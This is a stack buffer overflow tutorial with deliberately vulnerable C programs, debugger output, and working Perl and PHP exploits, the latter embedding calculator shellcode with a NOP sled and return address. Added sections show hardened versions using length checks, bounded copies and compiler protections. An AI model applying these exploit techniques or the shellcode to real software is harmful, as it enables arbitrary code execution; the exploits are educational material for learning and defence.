Stack buffer overflow
A buffer overflow happens when the program doesn't check the buffer size (it seems an easy explanation). My C programming is not as good as my PHP, but I've written an example after a bit of searching. The vulnerable code, called bug.c, is shown below:

```c
#include <stdio.h>
#include <string.h>

int Impossible(void);

/* Deliberately vulnerable: strcpy() copies str into a 10-byte stack buffer
 * with no length check, so a longer argument overwrites the saved frame
 * pointer and the return address that follow it on the stack. */
int bug(char *str){
    char buffer[10];
    strcpy(buffer,str);
    return 0;
}

int main (int argc,char **argv) {
    char * text = "Get away fucking lozer!";
    int varible=0;
    if (argc < 2) return 1;         /* the program expects one argument */
    printf("Gonna into vuln.exe now\n");
    bug(argv[1]);
    if ( varible ==1){              /* never true: Impossible() is unreachable */
        Impossible();
    }else{
        printf("%s \n",text);
    }
    printf("Exiting from vuln.exe");
    return 0;
}

int Impossible() {
    printf("Great ! You are success\n");
    printf("But also you are a fucking lozer !\n");
    return 0;
}
```
- The Impossible() function is never executed, because the 'IF' acts as a dam in the program. In this article I'm going to cover some methods of exploitation that execute this function through the buffer overflow hole in the vulnerable program! The strcpy() function copies the input string (str) into buffer, and the buffer size is defined beforehand:
buffer[10];
What happens when a large string like "aaa ...." (60 times) goes into the program as input? With 60 chars the program is overflowed and the return address (EIP) gets overwritten; after that event the new return address is 61616161 ('a' is 97 in ASCII, and 97 is 61 in hex).
The return address has been changed to 61616161, which doesn't exist, so Windows shows you an error. To follow our goal we need some information, explained further on. At the beginning we have to find out how many bytes we need (28 bytes, but why?) and we should point at the Impossible function's address, which can simply be found with a debugger:
```
Dump of assembler code for function Impossible:
0x40132c <Impossible>:      push   %ebp
0x40132d <Impossible+1>:    mov    %esp,%ebp
0x40132f <Impossible+3>:    sub    $0x8,%esp
0x401332 <Impossible+6>:    movl   $0x40304b,(%esp,1)
0x401339 <Impossible+13>:   call   0x401880 <printf>
0x40133e <Impossible+18>:   movl   $0x403064,(%esp,1)
0x401345 <Impossible+25>:   call   0x401880 <printf>
0x40134a <Impossible+30>:   leave
0x40134b <Impossible+31>:   ret
0x40134c <Impossible+32>:   nop
0x40134d <Impossible+33>:   nop
0x40134e <Impossible+34>:   nop
0x40134f <Impossible+35>:   nop
End of assembler dump.
```
The requirements are not yet met: execution has to continue at the address 0040132c, which is the Impossible() function, and the return address (EIP) takes 4 bytes, so the debugger is able to find the number of bytes that are needed (for more, see the clip). 28 bytes does the job; the following exploit is written in Perl:

```perl
#!/usr/bin/perl
$junk = "A" x 28;                 # filler up to the saved return address
$retaddress = "\x2C\x13\x40";     # 0040132c, little-endian; #"\x2C\x13\x40\x00"
$xpl = $junk.$retaddress;
system("bug.exe",$xpl);
```
- The Impossible function will be called by executing the exploit. It's almost done here; the tutorial clip that completes my article is available HERE.
- The second code shows whatever is in the text file "input.txt". Take a look at the vulnerable program code:
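For contrast, here is the defensive counterpart of bug.c. This is an added example, not code from the original article: the same 10-byte stack buffer, but the copy is refused when the input does not fit, plus a general bounded-copy helper that reports truncation instead of overrunning. The names bug_checked, copy_bounded and demo_checked_copy are my own; the constructed 28-byte input mirrors the filler length discussed above.

```c
#include <stdio.h>
#include <string.h>
#include <errno.h>

/* Same 10-byte stack buffer as bug(), but the copy is refused unless the
 * NUL-terminated input fits. Returns 0 on success, -1 (errno = EMSGSIZE)
 * when the input would have overflowed. Nothing past buffer[9] is written. */
int bug_checked(const char *str)
{
    char buffer[10];
    size_t len = strlen(str);

    if (len >= sizeof buffer) {      /* need room for len chars plus the terminator */
        errno = EMSGSIZE;
        return -1;
    }
    memcpy(buffer, str, len + 1);    /* copy including the terminator */
    return 0;
}

/* Bounded copy with strlcpy-like semantics (strlcpy is not in every libc):
 * writes at most dstsz-1 bytes, always NUL-terminates dst, and returns the
 * full source length so the caller can detect truncation (result >= dstsz). */
size_t copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (dstsz == 0) return len;
    size_t n = len < dstsz - 1 ? len : dstsz - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return len;
}

/* Constructed inputs: a 4-byte string that fits, and 28 bytes of 'A',
 * the filler length the article uses to reach the saved return address. */
int demo_checked_copy(void)
{
    char small[] = "abcd";
    char big[29];
    memset(big, 'A', 28);
    big[28] = '\0';

    int ok = bug_checked(small);      /* 0: accepted */
    int rejected = bug_checked(big);  /* -1: refused before touching the stack */

    char dst[10];
    size_t needed = copy_bounded(dst, sizeof dst, big);
    int truncated = needed >= sizeof dst;   /* 1: 28 bytes did not fit in 10 */

    printf("small: %d, big: %d, truncated: %d, dst=\"%s\"\n",
           ok, rejected, truncated, dst);
    return ok == 0 && rejected == -1 && truncated;
}

int main(void)
{
    return demo_checked_copy() ? 0 : 1;
}
```

The length check is the fix; as a second layer, building the original with `-fstack-protector-all` (stack canary) and `-O2 -D_FORTIFY_SOURCE=2` (which turns a strcpy into a fixed-size buffer into a checked call) makes the 28-byte input abort the process instead of redirecting execution.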
```c
#include <stdio.h>
#include <string.h>

int Rfile(char*,char*,int);

/* Deliberately vulnerable: up to 1000 bytes from the file are copied into a
 * 300-byte stack buffer, starting 12 bytes in, with no length check. */
int vuln(char *str){
    char Lbuffer[300] = "File Data : ";
    strcpy(Lbuffer+12,str);
    printf("\n\n%s\n\n",Lbuffer);
    return 0;
}

int main(){
    char buff[1000];
    char FNAME[] = "input.txt";
    if (Rfile(buff,FNAME,1000) != 0) return 1;
    vuln(buff);
    return 0;
}

/* Reads the whole file, storing at most lim bytes, then NUL-terminates. */
int Rfile(char *buffer,char *Fname,int lim){
    int a;
    int b=0;
    FILE *pFile = fopen(Fname,"r");
    if (pFile == NULL) {            /* avoid calling getc() on a NULL stream */
        perror(Fname);
        return -1;
    }
    while( ( a = getc ( pFile ) )!= EOF ){
        if ( b < lim ){
            buffer[b++] = a;
        }
    }
    buffer[b++] = 0;
    fclose(pFile);
    return 0;
}
```
- By creating "input.txt" in the same directory, putting whatever text you want into it and running the program, the result is shown in the black box, the command prompt:
```
d:\Documents and Settings\Sc0rpion\Desktop>read

File Data : [ The text that is given to program by user ]

d:\Documents and Settings\Sc0rpion\Desktop>
```
- It seems everything is OK, but wait a moment: if a large string goes into "input.txt", trouble is made, meaning the program is overflowed by a bad string:
aaaaaa ..... x 1000
Exploiting the written program to execute the calculator via the included bug... hmm, interesting? If you no longer wish to guess the buffer size, solve it by referring to the debugger (see the second clip for more). The Metasploit official site helps you create shellcode (I used calculator shellcode).
Finally I wrote the exploit in my favourite programming language, "PHP"; it can be written simply in C++ too. And one more thing: being a new programmer isn't an excuse.

```php
<?php
# shellcode 164 bytes
$shellcode ="\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98".
"\x1d\xdc\x62\x83\xeb\xfc\xe2\xf4\x64\xf5\x98\x62\x98\x1d\x57\x27".
"\xa4\x96\xa0\x67\xe0\x1c\x33\xe9\xd7\x05\x57\x3d\xb8\x1c\x37\x2b".
"\x13\x29\x57\x63\x76\x2c\x1c\xfb\x34\x99\x1c\x16\x9f\xdc\x16\x6f".
"\x99\xdf\x37\x96\xa3\x49\xf8\x66\xed\xf8\x57\x3d\xbc\x1c\x37\x04".
"\x13\x11\x97\xe9\xc7\x01\xdd\x89\x13\x01\x57\x63\x73\x94\x80\x46".
"\x9c\xde\xed\xa2\xfc\x96\x9c\x52\x1d\xdd\xa4\x6e\x13\x5d\xd0\xe9".
"\xe8\x01\x71\xe9\xf0\x15\x37\x6b\x13\x9d\x6c\x62\x98\x1d\x57\x0a".
"\xa4\x42\xed\x94\xf8\x4b\x55\x9a\x1b\xdd\xa7\x32\xf0\xed\x56\x66".
"\xc7\x75\x44\x9c\x12\x13\x8b\x9d\x7f\x7e\xb1\x06\xb6\x78\xa4\x07".
"\x98\x1d\xdc\x62";

# 140 bytes NOP
$nop = str_repeat("\x90", 140);

# 4 bytes return address
$retadd = "\xA0\xFB\x22\x00"; //0022FBA0

$fp = fopen('input.txt','a+');
fputs($fp,$nop);
fputs($fp,$shellcode);
fputs($fp,$retadd);
fclose($fp);
print "Creating exploit ... done\n";
?>
```
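The second program has two separate length problems: Rfile() tests `b < lim` and then writes `buffer[b++] = 0`, so a file of exactly lim bytes puts the terminator one past the end of the array, and vuln() copies whatever was read into a 300-byte buffer with strcpy(). The following is an added example, not code from the original article, showing how both are handled safely: a reader that reserves a byte for the terminator and discards excess input, and a formatter that uses snprintf() and reports truncation. The names read_stream_bounded, format_file_data and demo_bounded_read are my own, and the 1000-byte stream is constructed in memory instead of reading input.txt.

```c
#include <stdio.h>
#include <string.h>

/* Reads from stream until EOF or until lim-1 bytes are stored, then
 * NUL-terminates. Reserving one byte for the terminator removes the
 * off-by-one; bytes beyond the limit are consumed and dropped, never
 * written. Returns the number of bytes stored (excluding the terminator). */
size_t read_stream_bounded(FILE *stream, char *buffer, size_t lim)
{
    size_t b = 0;
    int a;
    if (lim == 0) return 0;
    while ((a = getc(stream)) != EOF) {
        if (b < lim - 1) buffer[b++] = (char)a;
    }
    buffer[b] = '\0';
    return b;
}

/* Builds the "File Data : <text>" line into a fixed buffer. snprintf()
 * never writes more than outsz bytes and returns the length the complete
 * string would have had, so truncation is detectable instead of silent.
 * Returns 1 if everything fit, 0 if str was cut off. */
int format_file_data(char *out, size_t outsz, const char *str)
{
    int n = snprintf(out, outsz, "File Data : %s", str);
    return n >= 0 && (size_t)n < outsz;
}

/* Constructed sample: a stream of 1000 'a' bytes, the length the article
 * feeds through input.txt. The reader stores 999 bytes plus a terminator,
 * and the 300-byte line buffer reports truncation rather than being overrun. */
int demo_bounded_read(void)
{
    char buff[1000];
    char line[300];
    FILE *f = tmpfile();
    if (!f) return 0;
    for (int i = 0; i < 1000; i++) putc('a', f);
    rewind(f);

    size_t stored = read_stream_bounded(f, buff, sizeof buff);
    fclose(f);
    int fit = format_file_data(line, sizeof line, buff);

    printf("stored=%zu fit=%d line_len=%zu\n", stored, fit, strlen(line));
    return stored == 999 && fit == 0 && strlen(line) == 299;
}

int main(void)
{
    return demo_bounded_read() ? 0 : 1;
}
```

The point of returning the truncation status is that the caller decides what to do with an over-long file (reject it, log it, or print the shortened line); the original reaches vuln() with no idea how much data arrived.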
- A simple exercise for exploiting:

```c
#include <stdio.h>
#include <string.h>
#define max 78

/* strcpy() into a fixed 255-byte stack buffer with no length check. */
int bug(char *string){
    char buff[255];
    strcpy(buff,string);
    return 0;
}

int target(){
    printf("I can't count\n");
    printf("bYe!\n");
    return 0;
}

enum { number0 , number1 } ;

int main (int argc, char *argv[]) {
    if (argc < 2) return 1;         /* the program expects one argument */
    bug(argv[1]);
    char * text = "hello World!";
    printf("I have something to say : %s\nI can count two wanna see?:%d%d\n", text, number0, number1);
    if ( max ==87)                  /* 78 != 87: target() is never reached normally */
        target();
    return 0 ;
}
```
The linked tutorial clip for the second part is loading here. Written by sc0rpion, all rights reserved.





Thanks for the article, I like this.